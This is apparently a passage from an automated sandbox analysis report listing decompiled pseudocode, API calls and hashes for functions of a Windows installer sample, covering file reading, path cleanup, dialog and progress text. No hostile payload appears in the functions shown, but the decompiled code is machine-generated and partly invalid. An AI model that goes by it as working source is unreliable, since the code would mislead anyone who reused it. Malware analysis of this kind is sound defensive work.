						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x004044dc
0x00404592
0x00000000
0x00404592
0x004044ed
0x004044f1
0x00000000
0x0040450b
0x0040450b
0x00404514
0x00000000
0x00000000
0x00404516
0x00404522
0x00404525
0x00404525
0x0040452b
0x00404531
0x00404531
0x0040453d
0x00404543
0x0040454a
0x0040454d
0x00404550
0x00404552
0x00404552
0x0040455a
0x00404560
0x00404560
0x0040456a
0x0040456f
0x00404572
0x00404577
0x0040457a
0x0040457a
0x0040458a
0x0040458a
0x00000000
0x0040458d

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004044E7
GetSysColor.USER32(00000000), ref: 00404525
SetTextColor.GDI32(?,00000000), ref: 00404531
SetBkMode.GDI32(?,?), ref: 0040453D
GetSysColor.USER32(?), ref: 00404550
SetBkColor.GDI32(?,?), ref: 00404560
DeleteObject.GDI32(?), ref: 0040457A
CreateBrushIndirect.GDI32(?), ref: 00404584

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E00406467(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E004060D8( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E0040607A( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E0040644E( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027bc
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040678E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040678E(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E4D(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E03(L"*?|<>/\":", _t5))) == 0) {
							E00405FB2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00406790
0x00406799
0x004067b0
0x004067b0
0x004067b7
0x004067c3
0x004067c3
0x004067c6
0x004067c9
0x004067ce
0x004067d0
0x004067d9
0x004067dd
0x004067fa
0x00406802
0x00406802
0x00406807
0x00406809
0x0040680c
0x00406811
0x00406812
0x00406816
0x00406816
0x00406817
0x0040681e
0x00406820
0x00406827
0x00000000
0x00000000
0x0040682f
0x00406835
0x00000000
0x00000000
0x00000000
0x00406835
0x0040683a

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,76D23420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
CharNextW.USER32(?,00000000,76D23420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
CharPrevW.USER32(?,?,76D23420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040678F
*?|<>/":, xrefs: 004067E0

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2977677972
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E1E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E1E(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404e2c
0x00404e39
0x00404e3f
0x00404e7d
0x00404e7d
0x00404e8c
0x00404e93
0x00000000
0x00404e95
0x00404e41
0x00404e50
0x00404e58
0x00404e5b
0x00404e6d
0x00404e73
0x00404e7a
0x00000000
0x00404e7a
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
GetMessagePos.USER32 ref: 00404E41
ScreenToClient.USER32(?,?), ref: 00404E5B
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93

Strings

f, xrefs: 00404E6F

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414eb8; // 0x88f43
					_t11 =  *0x420ec4; // 0x895d0
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fcd
0x00402fd4
0x00402fd6
0x00402fd6
0x00402fec
0x00402ffc
0x0040300e
0x0040300e
0x00403016

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(00088F43,00000064,000895D0), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58

Uniqueness

Uniqueness Score: -1.00%

Function 70AC2655 Relevance: 9.1, APIs: 6, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E70AC2655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E70AC12BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M70AC2784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x70ac407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x70ac409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E70AC1510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x70ac506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x70ac506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x70ac506c);
								goto L17;
							case 5:
								_push( *0x70ac506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x70ac5000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E70AC1381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E70AC1312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}

0x70ac265f
0x70ac2661
0x70ac2665
0x70ac2674
0x70ac2678
0x70ac267d
0x70ac267d
0x70ac2685
0x70ac268c
0x70ac2692
0x00000000
0x70ac2699
0x00000000
0x00000000
0x70ac26a1
0x70ac26a5
0x70ac26a8
0x70ac26ac
0x70ac26b3
0x70ac26b7
0x70ac26bd
0x70ac26bf
0x70ac26c1
0x70ac26c1
0x70ac26c8
0x00000000
0x00000000
0x70ac26d1
0x00000000
0x00000000
0x70ac26d8
0x70ac26de
0x70ac26e8
0x70ac26ee
0x70ac26f3
0x00000000
0x00000000
0x70ac2714
0x00000000
0x00000000
0x70ac26fa
0x70ac2700
0x70ac2701
0x70ac2703
0x00000000
0x00000000
0x70ac271c
0x70ac271e
0x70ac2724
0x70ac272a
0x70ac272a
0x00000000
0x00000000
0x70ac2692
0x70ac272d
0x70ac272d
0x70ac2732
0x70ac2743
0x70ac2743
0x70ac2749
0x70ac274e
0x70ac2753
0x70ac275f
0x70ac2764
0x00000000
0x70ac2769
0x70ac2755
0x70ac2756
0x70ac276a
0x70ac276a
0x70ac2753
0x70ac276b
0x70ac276c
0x70ac276f
0x70ac2783

APIs

Part of subcall function 70AC12BB: GlobalAlloc.KERNEL32(00000040,?,70AC12DB,?,70AC137F,00000019,70AC11CA,-000000A0), ref: 70AC12C5

GlobalFree.KERNEL32(?), ref: 70AC2743
GlobalFree.KERNEL32(00000000), ref: 70AC2778

Memory Dump Source

Source File: 00000001.00000002.4884852064.0000000070AC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 70AC0000, based on PE: true

Associated: 00000001.00000002.4884744827.0000000070AC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.4884980920.0000000070AC4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.4885091070.0000000070AC6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70ac0000_file.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: e9fe5e67fff8752d83442dafbc48eb9b2297177bc43d67efc3257f3d8e757785
Instruction ID: d161c12e106a02a875b66f28eb2c1011d74005caaaf9fe0cd3bf6166f934925e
Opcode Fuzzy Hash: e9fe5e67fff8752d83442dafbc48eb9b2297177bc43d67efc3257f3d8e757785
Instruction Fuzzy Hash: 4231B236604101DFCB16CFA5CEC4E2F77BAEB86304F234529F20287628CB74E8469B61

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E4D(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00405FD2(_t55);
				_t29 = E00405FF7(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a234;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034AF(_t49);
							E00403499(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FB2( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
